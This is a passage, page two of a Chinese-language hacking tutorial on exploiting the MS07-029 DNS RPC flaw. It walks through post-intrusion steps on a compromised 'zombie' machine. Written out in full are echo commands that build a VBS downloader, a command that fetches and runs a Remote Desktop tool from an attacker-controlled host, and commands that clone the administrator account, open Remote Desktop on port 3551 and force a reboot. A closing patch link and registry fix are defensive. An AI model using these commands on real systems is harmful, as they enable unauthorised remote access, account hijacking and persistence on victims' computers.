MS07-029漏洞利用入侵过程

下面我给大家介绍一下如何在肉鸡上面开3389，
在命令行里输入

@echo with wscript:if .arguments.count^<2 then .quit:end if > tony.vbs
@echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >> tony.vbs
@echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then .echo "Error:"+web.status:.quit >> tony.vbs
@echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >> tony.vbs

大概的意思就是在命令行创立一个用来下载的VBS脚本tony.vbs

然后把开3389的工具上传到你的个人空间,

我这里用的是火狐开3389的工具，在命令行里输入  cscript tony.vbs http://你空间地址/wrsky.exe c:\wrsky.exe

“wrsky.exe -c”可以克隆当前管理员帐号

再输入“c:\wrsky.exe -o 3551”

意思就是打开对方的远程桌面服务，并且使用3551端口。

用“wrsky.exe -k”可以检查3389是否开启，开启以后输入“wrsky.exe -r”,对方的电脑就自动重启以后就可以连接上去了。
在运行里输入"mstsc",登陆上去。

那熟悉而又亲切的画面出现在我们面前了。

如果是2K的系统，还有一个更加傻瓜化的工具open3389，直接运行就可以了，不需要任何参数，不过对方电脑会马上重启。

另外我还放了其他两个DNS利用工具和一篇ZWELL的精华文章在光盘里，有兴趣的朋友可以自己研究。

这个漏洞的危害是是分巨大的，目前利用DNS服务RPC漏洞传播的蠕虫病毒VanBot已经出现，变种已经开始疯狂传播。

WIN 2K或2003的朋友请赶快下载补丁
http://www.microsoft.com/china/technet/security/bulletin/ms07-029.mspx

或者打开记事本，输入：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters]

"RpcProtocol"=dword:00000004

保存为扩展名为 .REG 的文件，双击导入，再重新启动 DNS 服务即可。

上一页  [1] [2]